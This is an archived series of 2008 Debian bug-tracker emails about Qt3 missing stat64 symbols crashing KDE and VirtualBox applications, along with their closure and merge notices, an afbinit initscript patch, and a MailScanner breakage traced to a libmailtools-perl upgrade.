ii  libart-2.0-2 2.3.20-1Library of functions for 2D graphi
ii  libattr1 1:2.4.39-1  Extended attribute shared library
ii  libaudio21.9.1-1 Network Audio System - shared libr
ii  libc62.7-6   GNU C Library: Shared libraries
ii  libdbus-1-3  1.1.2-1 simple interprocess messaging syst
ii  libdbus-qt-1-1c2 0.62.git.20060814-2 simple interprocess messaging syst
ii  libdvdread3  0.9.7-6 library for reading DVDs
ii  libexpat11.95.8-4XML parsing C library - runtime li
ii  libfam0  2.7.0-13.1  Client library to control the FAM 
ii  libfontconfig1   2.5.0-2 generic font configuration library
ii  libfreetype6 2.3.5-1+b1  FreeType 2 font engine, shared lib
ii  libgcc1  1:4.3-20080202-1GCC support library
ii  libhal1  0.5.10-5Hardware Abstraction Layer - share
ii  libice6  2:1.0.4-1   X11 Inter-Client Exchange library
ii  libidn11 1.4-1   GNU libidn library, implementation
ii  libjpeg626b-14   The Independent JPEG Group's JPEG 
ii  libk3b3  1.0.4-6 The KDE cd burning application lib
ii  libmusicbrainz4c2a   2.1.5-1 Second generation incarnation of t
ii  libpng12-0   1.2.15~beta5-3  PNG library - runtime
ii  libqt3-mt3:3.3.8b-1  Qt GUI Library (Threaded runtime v
ii  libsm6   2:1.0.3-1+b1X11 Session Management library
ii  libstdc++6   4.3-20080202-1  The GNU Standard C++ Library v3
ii  libx11-6 2:1.0.3-7   X11 client-side library
ii  libxcursor1  1:1.1.9-1   X cursor management library
ii  libxext6 1:1.0.3-2   X11 miscellaneous extension librar
ii  libxft2  2.1.12-2FreeType-based font drawing librar
ii  libxi6   2:1.1.3-1   X11 Input extension library
ii  libxinerama1 1:1.0.2-1   X11 Xinerama extension library
ii  libxrandr2   2:1.2.2-1   X11 RandR extension library
ii  libxrender1  1:0.9.4-1   X Rendering Extension client libra
ii  libxt6   1:1.0.5-3   X11 toolkit intrinsics library
ii  wodim9:1.1.6-1   command line CD/DVD writing tool
ii  zlib1g   1:1.2.3.3.dfsg-11   compression library - runtime

Versions of packages k3b recommends:
ii  dvd+rw-tools7.0-9DVD+-RW/R tools
ii  kcontrol4:3.5.8.dfsg.1-7 control center for KDE
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE
pn  vcdimager  (no description available)

-- debconf-show failed


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is

Bug#465029: marked as done (virtualbox-ose: undefined symbol: stat64)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding virtualbox-ose: undefined symbol: stat64
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: virtualbox-ose
Version: 1.5.4-dfsg-4
Severity: important

Hi,

when I try to start VirtualBox I get this:


[EMAIL PROTECTED]:~/hacking$ VirtualBox
/usr/lib/virtualbox/VirtualBox: symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64


This problem appeared after todays package update.


Thanks,

Michael


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages virtualbox-ose depends on:
ii  adduser 3.105add and remove users and groups
ii  debconf [debconf-2.0]   1.5.19   Debian configuration management sy
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgl1-mesa-glx [libgl1 7.0.2-4  A free implementation of the OpenG
ii  libglib2.0-02.14.6-1 The GLib library of C routines
ii  libidl0 0.8.9-0.1library for parsing CORBA IDL file
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libsdl1.2debian 1.2.13-2 Simple DirectMedia Layer
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxalan110 1.10-3.1 Provides XSLT support for applicat
ii  libxcursor1 1:1.1.9-1X cursor management library
ii  libxerces27 2.7.0-5  validating XML parser library for 
ii  libxext61:1.0.3-2X11 miscellaneous extension librar
ii  libxt6  1:1.0.5-3X11 toolkit intrinsics library

Versions of packages virtualbox-ose recommends:
ii  virtualbox-ose-mod 2.6.22+1.5.2-dfsg2-9  PC virtualization solution modules
ii  virtualbox-ose-mod 1.5.4-dfsg-4+2.6.24-3 VirtualBox modules for Linux (kern
ii  virtualbox-ose-mod 1.5.4-dfsg-4+2.6.24-3 VirtualBox modules for Linux (kern

-- debconf information:
  virtualbox-ose/upstream_version_change: false

-- 
GPG key:  1024D/3144BE0F Michael Hanke
http://apsy.gse.uni-magdeburg.de/hanke
ICQ: 48230050


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-

Bug#465759: marked as done (ktorrent: symbol lookup error [PPC])

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding ktorrent: symbol lookup error [PPC]
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: normal

Hi,
I do not know which severity best fits this bug so I set it normal. Feel free 
to change it.

When I start ktorrent I get the following error:
ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so: undefined symbol: 
lstat64

It seems that my package is correct (reportbug checked its integrity and found 
no problem).
Maybe the build used some ppc64 lib ? I do not know.

Thanks in advance

Best regards

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (900, 'unstable'), (500, 'testing'), (102, 'experimental'), (101, 
'stable')
Architecture: powerpc (ppc)

Kernel: Linux 2.6.24debug
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to fr_FR.UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ktorrent depends on:
ii  kdelibs4c2a 4:3.5.8.dfsg.1-7 core libraries and binaries for al
ii  libavahi-client30.6.22-2 Avahi client library
ii  libavahi-common30.6.22-2 Avahi common library
ii  libavahi-qt3-1  0.6.22-2 Avahi Qt 3 integration library
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgeoip1   1.4.4.dfsg-1 A non-DNS IP-to-country resolver l
ii  libgmp3c2   2:4.2.2+dfsg-2   Multiprecision arithmetic library
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3

Versions of packages ktorrent recommends:
ii  kdebase-data4:3.5.8.dfsg.1-7 shared data files for the KDE base
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-examples_3.3.8b-2_all.deb
qt3-linguist_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-linguist_3.3.8b-2_amd64.deb
qt3-qtconfig_3.

Bug#465028: marked as done (libqt3-mt: Missing weak symbols for stat64 functions)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding libqt3-mt: Missing weak symbols for stat64 functions
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libqt3-mt
Version: 3:3.3.8b-1
Severity: serious

Hi,

The Qt shared libraries were providing weak symbols for stat64,
lstat64 and fstat64 until version 3:3.3.7-9, but not anymore, other
Qt/KDE apps depend on those symbols, so they get terminated when the
symbols cannot be resolved during runtime (as the linking is done
lazyly). Affected applications I've seen terminate during runtime or
just when starting: gwenview and k3b.

regards,
guillem


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-examples_3.3.8b-2_all.deb
qt3-linguist_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-linguist_3.3.8b-2_amd64.deb
qt3-qtconfig_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-qtconfig_3.3.8b-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Fathi Boudra <[EMAIL PROTECTED]> (supplier of updated qt-x11-free package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sat, 16 Feb 2008 16:02:03 +0100
Source: qt-x11-free
Binary: libqt3-mt libqt3-mt-mysql libqt3-mt-odbc libqt3-mt-psql libqt3-mt-ibase 
libqt3-mt-sqlite libqt3-mt-dev libqt3-headers libqt3-compat-headers 
qt3-dev-tools qt3-designer qt3-apps-dev qt3-linguist qt3-assistant qt3-qtconfig 
qt3-dev-tools-embedded qt3-dev-tools-compat libqt3-i18n qt3-doc qt3-examples 
qt-x11-free-dbg
Architecture: source all amd64
Version: 3:3.3.8b-2
Distribution: unstable
Urgency: medium
Maintainer: Fathi Boudra <[EMAIL PROTECTED]>
Changed-By: Fathi Boudra <[EMAIL PROTECTED]>
Description: 
 libqt3-compat-headers - Qt 1.x and 2.x compatibility includes
 libqt3-he

Bug#462762: Please explicitly write actual bug-closing changes in changelog

2008-02-16 Thread Jonas Smedegaard
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

Recent changelog entry includes the following:

   * New upstream release (Closes: #455282, #462762)

When bugs are closed by a new package release, it is nice to close those 
bugs through the magic "closes:" hint in changelog, but please tie them 
to the actual changes related to the bugs closed.

I would expect the bugreports above to be wishlist bugs requesting a new 
upstream version of the package to get packaged for Debian. But they are 
not - one of the bugs was actually one I was hurt by, and wanted te get 
informed when fixed.

As an example, the above coulde be better written like this:

   * New upstream release
 + Fixes FTBFS with GCC 4.3 (Closes: #455282)
 + Updated aclocal fixes conflicts with locales package on amd64 
   (Closes: #462762)


You probably shouldn't change this concrete changelog entry (I believe 
it is even forbidden by polic to restrspectively edit changelog), but 
please change habits in the future.


Kind regards,

  - Jonas

- -- 
* Jonas Smedegaard - idealist og Internet-arkitekt
* Tlf.: +45 40843136  Website: http://dr.jones.dk/

  - Enden er nær: http://www.shibumi.org/eoti.htm
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHtxPxn7DbMsAkQLgRAh+iAKCOlznjv4PT2/Jq0U5Zbn6k4OOoaQCeKJx+
t5ovn285x/eUQtEd3+Aby64=
=g79i
-END PGP SIGNATURE-




Processed: tagging 465708

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.9.26
> tags 465708 pending
Bug#465708: An error is made in postinst
There were no tags set.
Tags added: pending

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466106: Initscript should not fail if microcode is unavailable (+ other improvments)

2008-02-16 Thread Adam Cécile (Le_Vert)

Package: afbinit
Severity: serious
Tags: patch

Hello,

Afbinit installation fails when installing for the first time. The main 
problem is that firmware miss is fatal, but I guess we should be able to 
install the package first, then read README.Debian to figure out how to 
get the firmware.
Here is a small patch against current sid package that do not fail if 
the firmware is not present, check if it's the right one (md5) and a 
minor README.Debian with more informations about how to grab the microcode.


Thanks in advance,

Best regards, Adam.



--- System information. ---
Architecture: amd64
Kernel: Linux 2.6.22-2-amd64

Debian Release: lenny/sid
900 testing debmirror
500 ubuntu-doko people.ubuntu.com
500 testing www.debian-multimedia.org
400 unstable debmirror

--- Package information. ---
Depends (Version) | Installed
===-+-===
|

diff -Nur afbinit-1.0/debian/afbinit.init afbinit-1.0.new/debian/afbinit.init
--- afbinit-1.0/debian/afbinit.init	2008-02-16 16:52:01.0 +0100
+++ afbinit-1.0.new/debian/afbinit.init	2008-02-16 16:49:05.043692598 +0100
@@ -32,7 +32,12 @@
 fi
 if [ ! -f /usr/lib/afb.ucode ];then
 log_failure_msg "Cannot find AFB microcode (/usr/lib/afb.ucode)"
-exit 1
+log_failure_msg "Please read /usr/share/doc/afbinit/README.Debian to see how to obtain it"
+exit 0
+elif [ `md5sum /usr/lib/afb.ucode | cut -f1 -d' '` != '7cb8dda314278b3cae28da150a53973b' ]; then
+log_failure_msg "AFB microcode (/usr/lib/afb.ucode) seems to be corrupted"
+log_failure_msg "Its md5 should be 7cb8dda314278b3cae28da150a53973b"
+exit 0
 fi
 
 case "$1" in
diff -Nur afbinit-1.0/debian/changelog afbinit-1.0.new/debian/changelog
--- afbinit-1.0/debian/changelog	2008-02-16 16:52:01.0 +0100
+++ afbinit-1.0.new/debian/changelog	2008-02-16 16:51:41.172589881 +0100
@@ -1,3 +1,12 @@
+afbinit (1.0-4) unstable; urgency=low
+
+  * Improve README.Debian with the right way to get microcode.
+  * Check md5sum of the microcode before trying to load it.
+  * Do not fail if microcode is corrupted or unavailable.
+  * Thanks to Adam Cécile for his suggestions.
+
+ -- Emanuele Rocca <[EMAIL PROTECTED]>  Sat, 16 Feb 2008 16:49:12 +0100
+
 afbinit (1.0-3) unstable; urgency=low
 
   * Add missing includes (Closes: #451635)
diff -Nur afbinit-1.0/debian/README.Debian afbinit-1.0.new/debian/README.Debian
--- afbinit-1.0/debian/README.Debian	2008-02-16 16:52:01.0 +0100
+++ afbinit-1.0.new/debian/README.Debian	2008-02-16 16:13:40.010593866 +0100
@@ -2,8 +2,11 @@
 --
 
 This package requires the AFB microcode, which can be obtained from
-several places. One way is via a Solaris package. You may also find it on
-Sun's website (I found it by doing a search on Google).
+several places. The easiest way to have it is to grab a Solaris patch from
+Sun's website:
+
+Go to http://sunsolve.sun.com/ and search for patch number #108604.
+Download it. Once it's done, unzip the file.
 
 NOTE: The microcode is proprietary and NOT FREE. As in not free speech.
 


Bug#465095: mailscanner fails to start with FIELD_NAME not imported

2008-02-16 Thread Tom Faska
I have experienced this problem and found that it is caused by upgrading 
libmailtools-perl from version 1.77-1 to 2.02-1.  The problem is fixed 
when downgrading the libmailtools-perl back to version 1.77-1.  This is 
reproducible as seen from the terminal capture below.


Apparently there is some incompatibility between Mailscanner 4.58.9-2 
and libmailtools-perl version 2.02-1.


I hope this helps.

Tom

--

Mailscanner version installed
   monitor:~# dpkg -l mailscanner
   Desired=Unknown/Install/Remove/Purge/Hold
   | 
Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
   |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: 
uppercase=bad)

   ||/ Name   VersionDescription
   
+++-==-==-

   ii  mailscanner4.58.9-2   email virus scanner and spam tagger


Stop and restart Mailscanner with no errors on start
   monitor:~# /etc/init.d/mailscanner stop
   Program MailScanner, 1 process(es), refused to die.
   monitor:~# /etc/init.d/mailscanner stop
   monitor:~# /etc/init.d/mailscanner start

Upgrade libmailtools-perl from version 1.77-1 to 2.02-1
   monitor:~# apt-get -u upgrade
   Reading package lists... Done
   Building dependency tree... Done
   The following packages will be upgraded:
 libmailtools-perl
   1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
   Need to get 0B/96.6kB of archives.
   After unpacking 28.7kB disk space will be freed.
   Do you want to continue [Y/n]?
   (Reading database ... 38857 files and directories currently installed.)
   Preparing to replace libmailtools-perl 1.77-1 (using 
.../libmailtools-perl_2.02-1_all.deb) ...

   Unpacking replacement libmailtools-perl ...
   Setting up libmailtools-perl (2.02-1) ...

Now stop and restart Mailscanner with the error
   monitor:~# /etc/init.d/mailscanner stop
   Program MailScanner, 1 process(es), refused to die.
   monitor:~# /etc/init.d/mailscanner stop
   monitor:~# /etc/init.d/mailscanner start
   Variable "$FIELD_NAME" is not imported at 
/usr/share/MailScanner/MailScanner/Message.pm line 6367.
   Variable "$FIELD_NAME" is not imported at 
/usr/share/MailScanner/MailScanner/Message.pm line 6370.

   Global symbol "$FIELD_NAME" requires explicit package name at
   /usr/share/MailScanner/MailScanner/Message.pm line 6367.
   Global symbol "$FIELD_NAME" requires explicit package name at
   /usr/share/MailScanner/MailScanner/Message.pm line 6370.
   Compilation failed in require at /usr/sbin/MailScanner line 79.
   BEGIN failed--compilation aborted at /usr/sbin/MailScanner line 79.

Mailscanner failed to start
   monitor:~# /etc/init.d/mailscanner stop
   No MailScanner found running; none killed.

Downgrade libmailtools-perl back to version 1.77
   monitor:~# dpkg --force-downgrade -i 
/var/cache/apt/archives/libmailtools-perl_1.77-1_all.deb

   dpkg - warning: downgrading libmailtools-perl from 2.02-1 to 1.77-1.
   (Reading database ... 38855 files and directories currently installed.)
   Preparing to replace libmailtools-perl 2.02-1 (using 
.../libmailtools-perl_1.77-1_all.deb) ...

   Unpacking replacement libmailtools-perl ...
   Setting up libmailtools-perl (1.77-1) ...

Now no errors on start
   monitor:~# /etc/init.d/mailscanner start

Mailscanner processes are running
   monitor:~# ps aux | grep Mail
   postfix  24102  0.0  0.9  25160 19468 ?SNs  09:49   0:00 
MailScanner: master waiting for

   children, sleeping
   postfix  24103  1.8  3.8 101732 80140 ?SN   09:49   0:08 
MailScanner: waiting for messages
   postfix  24110  1.8  3.8 101732 80132 ?SN   09:49   0:08 
MailScanner: waiting for messages
   postfix  24113  1.9  3.8 102312 80848 ?SN   09:50   0:09 
MailScanner: waiting for messages
   postfix  24116  1.9  3.8 101728 80124 ?SN   09:50   0:08 
MailScanner: waiting for messages

   monitor:~#
   





--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 465555 to libqt3-mt, severity of 465555 is serious, forcibly merging 465555 465028

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> reassign 46 libqt3-mt
Bug#46: kmail symbol lookup error at startup
Bug reassigned from package `kmail' to `libqt3-mt'.

> severity 46 serious
Bug#46: kmail symbol lookup error at startup
Severity set to `serious' from `important'

> forcemerge 46 465028
Bug#46: kmail symbol lookup error at startup
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#464946: K3b crashes because of library problem
Bug#465029: virtualbox-ose: undefined symbol: stat64
Bug#465046: symbol lookup error
Bug#465125: kcm_fonts.so: undefined symbol: lstat64
Bug#465151: virtualbox command raised undefined symbol: stat64
Bug#465239: virtualbox fails to start with "symbol lookup error: 
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64"
Bug#465259: Same problem with ktorrent
Bug#465300: kcontrol: font settings not avaible
Bug#465311: k3b: fails with symbol lookup error
Bug#465407: libqt3-mt: konqueror fails to display directory tree in the 
navigation area
Bug#465413: Undefined symbol stat64 in libk3b.so.3
Bug#465445: ktorrent fails to start with unresolved symbol error
Bug#465480: k3b always crashes when I want to burn something
Bug#465485: virtualbox-ose: Fails to start
Bug#465533: ktorrent: Fails to start; symbol lookup error: lstat64
Bug#465602: fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
Bug#465649: k3b crashes, symbol lookup error
Bug#465759: ktorrent: symbol lookup error [PPC]
Bug#465765: k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: 
stat64
Bug#465792: virtualbox-ose: cannot start virtualbox due to a undefined symbol 
"stat64" on i386
Bug#465839: symbol lookup error when starting ktorrent
Bug#465842: undefined symbol: stat64 (ktorrent doesn't start)
Bug#465926: virtualbox-ose: undefined symbol: stat64
Bug#465969: virtualbox-ose: stat 64 error on start
Forcibly Merged 464946 465028 465029 465046 465125 465151 465239 465259 465300 
465311 465407 465413 465445 465480 465485 465533 46 465602 465649 465759 
